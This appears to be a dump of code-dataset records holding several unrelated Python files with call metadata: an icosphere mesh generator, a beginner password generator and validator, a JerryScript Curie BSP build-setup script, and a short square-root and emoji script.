'Subscription.get_active_subscription_by_domain', ({(116, 78, 116, 89): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.apps.accounting.models import Subscription\n'), ((172, 8, 172, 72), 'corehq.apps.custom_data_fields.dbaccessors.get_by_domain_and_type.clear', 'get_by_domain_and_type.clear', ({(172, 37, 172, 48): 'domain_name', (172, 50, 172, 71): 'field_view.field_type'}, {}), '(domain_name, field_view.field_type)', False, 'from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type\n'), ((263, 9, 263, 28), 'django.db.connection.cursor', 'connection.cursor', ({}, {}), '()', False, 'from django.db import connection, transaction\n'), ((125, 50, 125, 108), 'corehq.apps.accounting.utils.get_change_status', 'get_change_status', ({(125, 68, 125, 101): 'current_subscription.plan_version', (125, 103, 125, 107): 'None'}, {}), '(current_subscription.plan_version, None)', False, 'from corehq.apps.accounting.utils import get_change_status\n'), ((161, 4, 161, 17), 'corehq.blobs.get_blob_db', 'get_blob_db', ({}, {}), '()', False, 'from corehq.blobs import CODES, get_blob_db\n'), ((41, 24, 41, 59), 'django.apps.apps.get_app_config', 'apps.get_app_config', ({(41, 44, 41, 58): 'self.app_label'}, {}), '(self.app_label)', False, 'from django.apps import apps\n'), ((143, 68, 143, 90), 'corehq.apps.domain.utils.silence_during_tests', 'silence_during_tests', ({}, {}), '()', False, 'from corehq.apps.domain.utils import silence_during_tests\n'), ((155, 
68, 155, 90), 'corehq.apps.domain.utils.silence_during_tests', 'silence_during_tests', ({}, {}), '()', False, 'from corehq.apps.domain.utils import silence_during_tests\n'), ((134, 12, 134, 35), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((134, 38, 134, 74), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((161, 41, 161, 88), 'corehq.blobs.models.BlobMeta.objects.partitioned_query', 'BlobMeta.objects.partitioned_query', ({(161, 76, 161, 87): 'domain_name'}, {}), '(domain_name)', False, 'from corehq.blobs.models import BlobMeta\n')] |
JackWalpole/icosahedron | icosphere/icosphere.py | 5317d8eb9509abe275beb2693730e3efaa986672 | """Subdivided icosahedral mesh generation"""
from __future__ import print_function
import numpy as np
# following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html
# hierarchy:
# Icosphere -> Triangle -> Point
class IcoSphere:
"""
Usage: IcoSphere(level)
Maximum supported level = 8
get started with:
>>> A = IcoSphere(3)
... A.plot3d()
"""
# maximum level for subdivision of the icosahedron
maxlevel = 8
def __init__(self, level):
if type(level) is not int:
raise TypeError('level must be an integer')
elif level < 0:
raise Exception('level must be no less than 0')
elif level > self.maxlevel:
raise Exception('level larger than ' + str(self.maxlevel) + ' not supported')
self.level = level
self.points = []
self.triangles = []
self.npts = 0
################################
# initialise level 1 icosahedron
################################
        # golden ratio
t = (1.0 + np.sqrt(5.0)) / 2.0
# add vertices
self._addPoint(np.array([-1, t, 0]))
self._addPoint(np.array([ 1, t, 0]))
self._addPoint(np.array([-1,-t, 0]))
self._addPoint(np.array([ 1,-t, 0]))
self._addPoint(np.array([ 0,-1, t]))
self._addPoint(np.array([ 0, 1, t]))
self._addPoint(np.array([ 0,-1,-t]))
self._addPoint(np.array([ 0, 1,-t]))
self._addPoint(np.array([ t, 0,-1]))
self._addPoint(np.array([ t, 0, 1]))
self._addPoint(np.array([-t, 0,-1]))
self._addPoint(np.array([-t, 0, 1]))
# make triangles
tris = self.triangles
verts = self.points
# 5 faces around point 0
tris.append(Triangle([ verts[0],verts[11], verts[5]]))
tris.append(Triangle([ verts[0], verts[5], verts[1]]))
tris.append(Triangle([ verts[0], verts[1], verts[7]]))
tris.append(Triangle([ verts[0], verts[7],verts[10]]))
tris.append(Triangle([ verts[0],verts[10],verts[11]]))
# 5 adjacent faces
tris.append(Triangle([ verts[1], verts[5], verts[9]]))
tris.append(Triangle([ verts[5],verts[11], verts[4]]))
tris.append(Triangle([verts[11],verts[10], verts[2]]))
tris.append(Triangle([verts[10], verts[7], verts[6]]))
tris.append(Triangle([ verts[7], verts[1], verts[8]]))
# 5 faces around point 3
tris.append(Triangle([ verts[3], verts[9], verts[4]]))
tris.append(Triangle([ verts[3], verts[4], verts[2]]))
tris.append(Triangle([ verts[3], verts[2], verts[6]]))
tris.append(Triangle([ verts[3], verts[6], verts[8]]))
tris.append(Triangle([ verts[3], verts[8], verts[9]]))
# 5 adjacent faces
tris.append(Triangle([ verts[4], verts[9], verts[5]]))
tris.append(Triangle([ verts[2], verts[4],verts[11]]))
tris.append(Triangle([ verts[6], verts[2],verts[10]]))
tris.append(Triangle([ verts[8], verts[6], verts[7]]))
tris.append(Triangle([ verts[9], verts[8], verts[1]]))
########################################
# refine triangles to desired mesh level
########################################
for l in range(self.level):
midPointDict = {}
faces = []
for tri in self.triangles:
# replace triangle by 4 triangles
p = tri.pts
a = self._getMiddlePoint(p[0], p[1], midPointDict)
b = self._getMiddlePoint(p[1], p[2], midPointDict)
c = self._getMiddlePoint(p[2], p[0], midPointDict)
faces.append(Triangle([p[0], a, c]))
faces.append(Triangle([p[1], b, a]))
faces.append(Triangle([p[2], c, b]))
faces.append(Triangle([a, b, c]))
            # once we have looped through all triangles, overwrite self.triangles
self.triangles = faces
self.nfaces = len(self.triangles)
# check that npts and nfaces are as expected
expected_npts = calculate_npts(self.level)
expected_nfaces = calculate_nfaces(self.level)
        if self.npts != expected_npts:
            raise Exception('npts '+str(self.npts)+' not as expected '+str(expected_npts))
        elif self.nfaces != expected_nfaces:
            raise Exception('nfaces '+str(self.nfaces)+' not as expected '+str(expected_nfaces))
def _addPoint(self, xyz):
"""Add point to self.points"""
self.points.append(Point(self.npts, xyz))
self.npts += 1
def _getMiddlePoint(self, p1, p2, midPointDict):
"""return Point"""
if not isinstance(p1, Point) or not isinstance(p2, Point):
raise TypeError('p1 and p2 must be Points')
# does point already exist?
key = tuple(sorted([p1.idx, p2.idx]))
if key in midPointDict:
# point exists
pass
else:
# point is new
self._addPoint((p1.xyz + p2.xyz)/2)
midPointDict[key] = self.points[-1]
return midPointDict[key]
def plot3d(self):
"""Matplotlib 3D plot of mesh"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xyz = np.asarray([ pt.xyz for pt in self.points ])
x = xyz[:,0]
y = xyz[:,1]
z = xyz[:,2]
ts = np.asarray([ [ p.idx for p in t.pts ] for t in self.triangles ])
        ax.plot_trisurf(x, y, z, triangles=ts)
plt.show()
def dump_xyz(self):
[ print(*pt.xyz) for pt in self.points ]
def dump_latlonr(self):
[ print(*cart2geo(*pt.xyz)) for pt in self.points ]
class Triangle:
"""A triangle adjoining three adjacent points"""
def __init__(self, pts):
if not isinstance(pts, list):
raise TypeError('pts must be a list')
elif len(pts) !=3:
raise Exception('pts must be of length 3')
else:
self.pts = pts
class Point:
"""A 3D point on the mesh"""
def __init__(self, idx, xyz):
if type(idx) is not int:
raise TypeError('idx must be an integer')
elif not isinstance(xyz,np.ndarray):
raise TypeError('xyz must be a numpy array')
elif xyz.size != 3:
raise Exception('xyz must be of size 3')
else:
# ensure length equals 1 and add to list of points
self.xyz = (xyz/np.linalg.norm(xyz))
self.idx = idx
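# Mesh size bookkeeping: each subdivision level quadruples the face count, so
# F = 20 * 4**level and E = 30 * 4**level; Euler's formula V - E + F = 2 then
# gives V = 2 + 10 * 4**level, i.e. 2 + 10 * (2**level)**2 as computed below.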
def calculate_npts(level):
n = 2**level
return 2 + 10 * n**2
def calculate_nfaces(level):
n = 2**level
return 20 * n**2
def cart2geo(x, y, z):
"""convert x y z cartesian coordinates to latitude longitude radius
    (angles returned in degrees); x, y and z may be scalars or numpy arrays.
    A right-handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
r = np.sqrt(x**2 + y**2 + z**2)
lon = np.rad2deg(np.arctan2(y,x))
lat = np.rad2deg(np.arcsin(z/r))
return lat, lon, r
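# e.g. cart2geo(0.0, 0.0, 1.0) == (90.0, 0.0, 1.0): the north pole at unit radius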
def geo2cart(lat, lon, r):
"""convert latitude longitude radius to x y z cartesian coordinates
    (lat and lon in degrees, matching cart2geo's output).
    A right-handed co-ordinate system is assumed with
-- x-axis going through the equator at 0 degrees longitude
-- y-axis going through the equator at 90 degrees longitude
-- z-axis going through the north pole."""
    lat, lon = np.deg2rad(lat), np.deg2rad(lon)  # inputs in degrees, to invert cart2geo
    x = r * np.cos(lon) * np.cos(lat)
    y = r * np.sin(lon) * np.cos(lat)
    z = r * np.sin(lat)
return x, y, z
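# e.g. geo2cart(90.0, 0.0, 1.0) is (0.0, 0.0, 1.0) up to floating-point error,
# inverting the cart2geo example above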
# def xyzToLatLonR(xyz):
# trans = np.array([np.])
| [((196, 8, 196, 35), 'numpy.sqrt', 'np.sqrt', ({(196, 16, 196, 34): 'x ** 2 + y ** 2 + z ** 2'}, {}), '(x ** 2 + y ** 2 + z ** 2)', True, 'import numpy as np\n'), ((138, 14, 138, 26), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((140, 14, 140, 58), 'numpy.asarray', 'np.asarray', ({(140, 25, 140, 57): '[pt.xyz for pt in self.points]'}, {}), '([pt.xyz for pt in self.points])', True, 'import numpy as np\n'), ((144, 13, 144, 77), 'numpy.asarray', 'np.asarray', ({(144, 24, 144, 76): '[[p.idx for p in t.pts] for t in self.triangles]'}, {}), '([[p.idx for p in t.pts] for t in self.triangles])', True, 'import numpy as np\n'), ((146, 8, 146, 18), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((197, 21, 197, 36), 'numpy.arctan2', 'np.arctan2', ({(197, 32, 197, 33): 'y', (197, 34, 197, 35): 'x'}, {}), '(y, x)', True, 'import numpy as np\n'), ((198, 21, 198, 35), 'numpy.arcsin', 'np.arcsin', ({(198, 31, 198, 34): 'z / r'}, {}), '(z / r)', True, 'import numpy as np\n'), ((207, 26, 207, 37), 'numpy.cos', 'np.cos', ({(207, 33, 207, 36): 'lat'}, {}), '(lat)', True, 'import numpy as np\n'), ((208, 26, 208, 37), 'numpy.cos', 'np.cos', ({(208, 33, 208, 36): 'lat'}, {}), '(lat)', True, 'import numpy as np\n'), ((209, 12, 209, 23), 'numpy.sin', 'np.sin', ({(209, 19, 209, 22): 'lat'}, {}), '(lat)', True, 'import numpy as np\n'), ((43, 23, 43, 43), 'numpy.array', 'np.array', ({(43, 32, 43, 42): '[-1, t, 0]'}, {}), '([-1, t, 0])', True, 'import numpy as np\n'), ((44, 23, 44, 43), 'numpy.array', 'np.array', ({(44, 32, 44, 42): '[1, t, 0]'}, {}), '([1, t, 0])', True, 'import numpy as np\n'), ((45, 23, 45, 43), 'numpy.array', 'np.array', ({(45, 32, 45, 42): '[-1, -t, 0]'}, {}), '([-1, -t, 0])', True, 'import numpy as np\n'), ((46, 23, 46, 43), 'numpy.array', 'np.array', ({(46, 32, 46, 42): '[1, -t, 0]'}, {}), '([1, -t, 0])', True, 'import numpy as np\n'), ((47, 23, 47, 43), 'numpy.array', 'np.array', ({(47, 32, 47, 42): '[0, -1, t]'}, {}), '([0, -1, t])', True, 'import numpy as np\n'), ((48, 23, 48, 43), 'numpy.array', 'np.array', ({(48, 32, 48, 42): '[0, 1, t]'}, {}), '([0, 1, t])', True, 'import numpy as np\n'), ((49, 23, 49, 43), 'numpy.array', 'np.array', ({(49, 32, 49, 42): '[0, -1, -t]'}, {}), '([0, -1, -t])', True, 'import numpy as np\n'), ((50, 23, 50, 43), 'numpy.array', 'np.array', ({(50, 32, 50, 42): '[0, 1, -t]'}, {}), '([0, 1, -t])', True, 'import numpy as np\n'), ((51, 23, 51, 43), 'numpy.array', 'np.array', ({(51, 32, 51, 42): '[t, 0, -1]'}, {}), '([t, 0, -1])', True, 'import numpy as np\n'), ((52, 23, 52, 43), 'numpy.array', 'np.array', ({(52, 32, 52, 42): '[t, 0, 1]'}, {}), '([t, 0, 1])', True, 'import numpy as np\n'), ((53, 23, 53, 43), 'numpy.array', 'np.array', ({(53, 32, 53, 42): '[-t, 0, -1]'}, {}), '([-t, 0, -1])', True, 'import numpy as np\n'), ((54, 23, 54, 43), 'numpy.array', 'np.array', ({(54, 32, 54, 42): '[-t, 0, 1]'}, {}), '([-t, 0, 1])', True, 'import numpy as np\n'), ((207, 12, 207, 23), 'numpy.cos', 'np.cos', ({(207, 19, 207, 22): 'lon'}, {}), '(lon)', True, 'import numpy as np\n'), ((208, 12, 208, 23), 'numpy.sin', 'np.sin', ({(208, 19, 208, 22): 'lon'}, {}), '(lon)', True, 'import numpy as np\n'), ((40, 19, 40, 31), 'numpy.sqrt', 'np.sqrt', ({(40, 27, 40, 30): '(5.0)'}, {}), '(5.0)', True, 'import numpy as np\n'), ((178, 28, 178, 47), 'numpy.linalg.norm', 'np.linalg.norm', ({(178, 43, 178, 46): 'xyz'}, {}), '(xyz)', True, 'import numpy as np\n')] |
Lidenbrock-ed/challenge-prework-backend-python | src/main.py | d2f46a5cf9ad649de90d4194d115cd9492eb583d | # Resolve the problem!!
import string
import random
SYMBOLS = list('!"#$%&\'()*+,-./:;?@[]^_`{|}~')
def generate_password():
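    """Build a random 15-character password from letters, digits and SYMBOLS."""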
# Start coding here
    letters_min = list(string.ascii_lowercase)  # the hand-written list was missing 'w'
    letters_may = list(string.ascii_uppercase)  # likewise missing 'W'
    numbers = list(string.digits)
safe_password = letters_min + letters_may + numbers + SYMBOLS
final_password = []
for i in range(15):
generate_caracter = random.choice(safe_password)
final_password.append(generate_caracter)
final_password = "".join(final_password)
print(final_password)
return final_password
def validate(password):
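    """Return True only for 8-16 character passwords that mix lowercase,
    uppercase, digits and symbols."""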
if len(password) >= 8 and len(password) <= 16:
has_lowercase_letters = False
has_numbers = False
has_uppercase_letters = False
has_symbols = False
for char in password:
if char in string.ascii_lowercase:
has_lowercase_letters = True
break
for char in password:
if char in string.ascii_uppercase:
has_uppercase_letters = True
break
for char in password:
if char in string.digits:
has_numbers = True
break
for char in password:
if char in SYMBOLS:
has_symbols = True
break
if has_symbols and has_numbers and has_lowercase_letters and has_uppercase_letters:
return True
return False
def run():
password = generate_password()
if validate(password):
print('Secure Password')
else:
print('Insecure Password')
if __name__ == '__main__':
run()
| [((17, 28, 17, 56), 'random.choice', 'random.choice', ({(17, 42, 17, 55): 'safe_password'}, {}), '(safe_password)', False, 'import random\n')] |
ideas-detoxes/jerryscript | targets/baremetal-sdk/curie-bsp/setup.py | 42523bd6e2b114755498c9f68fd78545f9b33476 | #!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fnmatch
import os
def build_soft_links(project_path, jerry_path):
""" Creates soft links into the @project_path. """
if not os.path.exists(project_path):
os.makedirs(project_path)
links = [
{ # arc
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'),
'link_name': 'arc'
},
{ # include
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'),
'link_name': 'include'
},
{ # quark
'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'),
'link_name': 'quark'
},
{ # quark/jerryscript
'src': jerry_path,
'link_name': os.path.join('quark', 'jerryscript')
}
]
for link in links:
src = os.path.join(jerry_path, link['src'])
link_name = os.path.join(project_path, link['link_name'])
if not os.path.islink(link_name):
os.symlink(src, link_name)
print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name))
def find_sources(root_dir, sub_dir):
"""
Find .c and .S files inside the @root_dir/@sub_dir directory.
Note: the returned paths will be relative to the @root_dir directory.
"""
src_dir = os.path.join(root_dir, sub_dir)
matches = []
for root, dirnames, filenames in os.walk(src_dir):
        for filename in fnmatch.filter(filenames, '*.[cS]'):  # character class: .c or .S
file_path = os.path.join(root, filename)
relative_path = os.path.relpath(file_path, root_dir)
matches.append(relative_path)
return matches
def build_jerry_data(jerry_path):
"""
Build up a dictionary which contains the following items:
- sources: list of JerryScript sources which should be built.
- dirs: list of JerryScript dirs used.
- cflags: CFLAGS for the build.
"""
jerry_sources = []
jerry_dirs = set()
for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]:
for file in find_sources(os.path.normpath(jerry_path), sub_dir):
path = os.path.join('jerryscript', file)
jerry_sources.append(path)
jerry_dirs.add(os.path.split(path)[0])
jerry_cflags = [
'-DJERRY_GLOBAL_HEAP_SIZE=10',
'-DJERRY_NDEBUG',
'-DJERRY_DISABLE_HEAVY_DEBUG',
'-DJERRY_BUILTIN_NUMBER=0',
'-DJERRY_BUILTIN_STRING=0',
'-DJERRY_BUILTIN_BOOLEAN=0',
#'-DJERRY_BUILTIN_ERRORS=0',
'-DJERRY_BUILTIN_ARRAY=0',
'-DJERRY_BUILTIN_MATH=0',
'-DJERRY_BUILTIN_JSON=0',
'-DJERRY_BUILTIN_DATE=0',
'-DJERRY_BUILTIN_REGEXP=0',
'-DJERRY_BUILTIN_ANNEXB=0',
'-DJERRY_ESNEXT=0',
'-DJERRY_LCACHE=0',
'-DJERRY_PROPERTY_HASHMAP=0',
]
return {
'sources': jerry_sources,
'dirs': jerry_dirs,
'cflags': jerry_cflags,
}
def write_file(path, content):
""" Writes @content into the file at specified by the @path. """
norm_path = os.path.normpath(path)
with open(norm_path, "w+") as f:
f.write(content)
print("Wrote file '{0}'".format(norm_path))
def build_obj_y(source_list):
"""
Build obj-y additions from the @source_list.
Note: the input sources should have their file extensions.
"""
return '\n'.join(['obj-y += {0}.o'.format(os.path.splitext(fname)[0]) for fname in source_list])
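# e.g. build_obj_y(['main.c', 'util/helper.S']) yields
# "obj-y += main.o\nobj-y += util/helper.o"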
def build_cflags_y(cflags_list):
"""
Build cflags-y additions from the @cflags_list.
"""
return '\n'.join(['cflags-y += {0}'.format(cflag) for cflag in cflags_list])
def build_mkdir(dir_list):
""" Build mkdir calls for each dir in the @dir_list. """
return '\n'.join(['\t$(AT)mkdir -p {0}'.format(os.path.join('$(OUT_SRC)', path)) for path in dir_list])
def create_root_kbuild(project_path):
""" Creates @project_path/Kbuild.mk file. """
root_kbuild_path = os.path.join(project_path, 'Kbuild.mk')
root_kbuild_content = '''
obj-$(CONFIG_QUARK_SE_ARC) += arc/
obj-$(CONFIG_QUARK_SE_QUARK) += quark/
'''
write_file(root_kbuild_path, root_kbuild_content)
def create_root_makefile(project_path):
""" Creates @project_path/Makefile file. """
root_makefile_path = os.path.join(project_path, 'Makefile')
root_makefile_content = '''
THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
T := $(abspath $(THIS_DIR)/../..)
PROJECT := {project_name}
BOARD := curie_101
ifeq ($(filter curie_101, $(BOARD)),)
$(error The curie jerry sample application can only run on the curie_101 Board)
endif
BUILDVARIANT ?= debug
quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig
arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig
# Optional: set the default version
VERSION_MAJOR := 1
VERSION_MINOR := 0
VERSION_PATCH := 0
include $(T)/build/project.mk
'''.format(project_name=project_name)
write_file(root_makefile_path, root_makefile_content)
def create_arc_kbuild(project_path):
""" Creates @project_path/arc/Kbuild.mk file. """
arc_path = os.path.join(project_path, 'arc')
arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk')
arc_sources = find_sources(arc_path, '.')
arc_kbuild_content = build_obj_y(arc_sources)
write_file(arc_kbuild_path, arc_kbuild_content)
def create_quark_kbuild(project_path, jerry_path):
""" Creates @project_path/quark/Kbuild.mk file. """
quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk')
# Extract a few JerryScript related data
jerry_data = build_jerry_data(jerry_path)
jerry_objects = build_obj_y(jerry_data['sources'])
jerry_defines = jerry_data['cflags']
jerry_build_dirs = build_mkdir(jerry_data['dirs'])
quark_include_paths = [
'include',
'jerryscript',
os.path.join('jerryscript', 'jerry-math', 'include'),
os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')
] + list(jerry_data['dirs'])
quark_includes = [
'-Wno-error',
] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths]
quark_cflags = build_cflags_y(jerry_defines + quark_includes)
quark_kbuild_content = '''
{cflags}
obj-y += main.o
{objects}
build_dirs:
{dirs}
$(OUT_SRC): build_dirs
'''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs)
write_file(quark_kbuild_path, quark_kbuild_content)
def main(curie_path, project_name, jerry_path):
project_path = os.path.join(curie_path, 'wearable_device_sw', 'projects', project_name)
build_soft_links(project_path, jerry_path)
create_root_kbuild(project_path)
create_root_makefile(project_path)
create_arc_kbuild(project_path)
create_quark_kbuild(project_path, jerry_path)
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print('Usage:')
print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0]))
sys.exit(1)
project_name = 'curie_bsp_jerry'
file_dir = os.path.dirname(os.path.abspath(__file__))
jerry_path = os.path.join(file_dir, "..", "..", "..")
curie_path = os.path.join(os.getcwd(), sys.argv[1])
main(curie_path, project_name, jerry_path)
| [((58, 14, 58, 45), 'os.path.join', 'os.path.join', ({(58, 27, 58, 35): 'root_dir', (58, 37, 58, 44): 'sub_dir'}, {}), '(root_dir, sub_dir)', False, 'import os\n'), ((61, 37, 61, 53), 'os.walk', 'os.walk', ({(61, 45, 61, 52): 'src_dir'}, {}), '(src_dir)', False, 'import os\n'), ((113, 16, 113, 38), 'os.path.normpath', 'os.path.normpath', ({(113, 33, 113, 37): 'path'}, {}), '(path)', False, 'import os\n'), ((143, 23, 143, 62), 'os.path.join', 'os.path.join', ({(143, 36, 143, 48): 'project_path', (143, 50, 143, 61): '"""Kbuild.mk"""'}, {}), "(project_path, 'Kbuild.mk')", False, 'import os\n'), ((154, 25, 154, 63), 'os.path.join', 'os.path.join', ({(154, 38, 154, 50): 'project_path', (154, 52, 154, 62): '"""Makefile"""'}, {}), "(project_path, 'Makefile')", False, 'import os\n'), ((180, 15, 180, 48), 'os.path.join', 'os.path.join', ({(180, 28, 180, 40): 'project_path', (180, 42, 180, 47): '"""arc"""'}, {}), "(project_path, 'arc')", False, 'import os\n'), ((181, 22, 181, 57), 'os.path.join', 'os.path.join', ({(181, 35, 181, 43): 'arc_path', (181, 45, 181, 56): '"""Kbuild.mk"""'}, {}), "(arc_path, 'Kbuild.mk')", False, 'import os\n'), ((190, 24, 190, 72), 'os.path.join', 'os.path.join', ({(190, 37, 190, 49): 'project_path', (190, 51, 190, 58): '"""quark"""', (190, 60, 190, 71): '"""Kbuild.mk"""'}, {}), "(project_path, 'quark', 'Kbuild.mk')", False, 'import os\n'), ((227, 19, 227, 91), 'os.path.join', 'os.path.join', ({(227, 32, 227, 42): 'curie_path', (227, 44, 227, 64): '"""wearable_device_sw"""', (227, 66, 227, 76): '"""projects"""', (227, 78, 227, 90): 'project_name'}, {}), "(curie_path, 'wearable_device_sw', 'projects', project_name)", False, 'import os\n'), ((248, 17, 248, 57), 'os.path.join', 'os.path.join', ({(248, 30, 248, 38): 'file_dir', (248, 40, 248, 44): '""".."""', (248, 46, 248, 50): '""".."""', (248, 52, 248, 56): '""".."""'}, {}), "(file_dir, '..', '..', '..')", False, 'import os\n'), ((23, 11, 23, 39), 'os.path.exists', 'os.path.exists', ({(23, 26, 23, 38): 'project_path'}, {}), '(project_path)', False, 'import os\n'), ((24, 8, 24, 33), 'os.makedirs', 'os.makedirs', ({(24, 20, 24, 32): 'project_path'}, {}), '(project_path)', False, 'import os\n'), ((46, 14, 46, 51), 'os.path.join', 'os.path.join', ({(46, 27, 46, 37): 'jerry_path', (46, 39, 46, 50): "link['src']"}, {}), "(jerry_path, link['src'])", False, 'import os\n'), ((47, 20, 47, 65), 'os.path.join', 'os.path.join', ({(47, 33, 47, 45): 'project_path', (47, 47, 47, 64): "link['link_name']"}, {}), "(project_path, link['link_name'])", False, 'import os\n'), ((62, 24, 62, 60), 'fnmatch.filter', 'fnmatch.filter', ({(62, 39, 62, 48): 'filenames', (62, 50, 62, 59): '"""*.[c|S]"""'}, {}), "(filenames, '*.[c|S]')", False, 'import fnmatch\n'), ((79, 48, 79, 111), 'os.path.join', 'os.path.join', ({(79, 61, 79, 70): '"""targets"""', (79, 72, 79, 87): '"""baremetal-sdk"""', (79, 89, 79, 100): '"""curie-bsp"""', (79, 102, 79, 110): '"""source"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'source')", False, 'import os\n'), ((243, 8, 243, 19), 'sys.exit', 'sys.exit', ({(243, 17, 243, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((247, 31, 247, 56), 'os.path.abspath', 'os.path.abspath', ({(247, 47, 247, 55): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((249, 30, 249, 41), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((28, 19, 28, 92), 'os.path.join', 'os.path.join', ({(28, 32, 28, 41): '"""targets"""', (28, 43, 28, 58): '"""baremetal-sdk"""', (28, 60, 28, 71): '"""curie-bsp"""', (28, 73, 28, 84): 
'"""jerry_app"""', (28, 86, 28, 91): '"""arc"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc')", False, 'import os\n'), ((32, 19, 32, 96), 'os.path.join', 'os.path.join', ({(32, 32, 32, 41): '"""targets"""', (32, 43, 32, 58): '"""baremetal-sdk"""', (32, 60, 32, 71): '"""curie-bsp"""', (32, 73, 32, 84): '"""jerry_app"""', (32, 86, 32, 95): '"""include"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include')", False, 'import os\n'), ((36, 19, 36, 94), 'os.path.join', 'os.path.join', ({(36, 32, 36, 41): '"""targets"""', (36, 43, 36, 58): '"""baremetal-sdk"""', (36, 60, 36, 71): '"""curie-bsp"""', (36, 73, 36, 84): '"""jerry_app"""', (36, 86, 36, 93): '"""quark"""'}, {}), "('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark')", False, 'import os\n'), ((41, 25, 41, 61), 'os.path.join', 'os.path.join', ({(41, 38, 41, 45): '"""quark"""', (41, 47, 41, 60): '"""jerryscript"""'}, {}), "('quark', 'jerryscript')", False, 'import os\n'), ((48, 15, 48, 40), 'os.path.islink', 'os.path.islink', ({(48, 30, 48, 39): 'link_name'}, {}), '(link_name)', False, 'import os\n'), ((49, 12, 49, 38), 'os.symlink', 'os.symlink', ({(49, 23, 49, 26): 'src', (49, 28, 49, 37): 'link_name'}, {}), '(src, link_name)', False, 'import os\n'), ((63, 24, 63, 52), 'os.path.join', 'os.path.join', ({(63, 37, 63, 41): 'root', (63, 43, 63, 51): 'filename'}, {}), '(root, filename)', False, 'import os\n'), ((64, 28, 64, 64), 'os.path.relpath', 'os.path.relpath', ({(64, 44, 64, 53): 'file_path', (64, 55, 64, 63): 'root_dir'}, {}), '(file_path, root_dir)', False, 'import os\n'), ((80, 33, 80, 61), 'os.path.normpath', 'os.path.normpath', ({(80, 50, 80, 60): 'jerry_path'}, {}), '(jerry_path)', False, 'import os\n'), ((81, 19, 81, 52), 'os.path.join', 'os.path.join', ({(81, 32, 81, 45): '"""jerryscript"""', (81, 47, 81, 51): 'file'}, {}), "('jerryscript', file)", False, 'import os\n'), ((201, 8, 201, 60), 'os.path.join', 'os.path.join', ({(201, 21, 201, 34): '"""jerryscript"""', (201, 36, 201, 48): '"""jerry-math"""', (201, 50, 201, 59): '"""include"""'}, {}), "('jerryscript', 'jerry-math', 'include')", False, 'import os\n'), ((202, 8, 202, 87), 'os.path.join', 'os.path.join', ({(202, 21, 202, 34): '"""jerryscript"""', (202, 36, 202, 45): '"""targets"""', (202, 47, 202, 62): '"""baremetal-sdk"""', (202, 64, 202, 75): '"""curie-bsp"""', (202, 77, 202, 86): '"""include"""'}, {}), "('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')", False, 'import os\n'), ((137, 51, 137, 83), 'os.path.join', 'os.path.join', ({(137, 64, 137, 76): '"""$(OUT_SRC)"""', (137, 78, 137, 82): 'path'}, {}), "('$(OUT_SRC)', path)", False, 'import os\n'), ((207, 18, 207, 59), 'os.path.join', 'os.path.join', ({(207, 31, 207, 43): 'project_path', (207, 45, 207, 52): '"""quark"""', (207, 54, 207, 58): 'path'}, {}), "(project_path, 'quark', path)", False, 'import os\n'), ((83, 27, 83, 46), 'os.path.split', 'os.path.split', ({(83, 41, 83, 45): 'path'}, {}), '(path)', False, 'import os\n'), ((124, 46, 124, 69), 'os.path.splitext', 'os.path.splitext', ({(124, 63, 124, 68): 'fname'}, {}), '(fname)', False, 'import os\n')] |
genisyskernel/cursoemvideo-python | pythonteste/aula08a.py | dec301e33933388c886fe78010f38adfb24dae82 | from math import sqrt
import emoji
num = int(input("Digite um número: "))
raiz = sqrt(num)
print("A raiz do número {0} é {1:.2f}.".format(num, raiz))
print(emoji.emojize("Hello World! :earth_americas:", use_aliases=True))
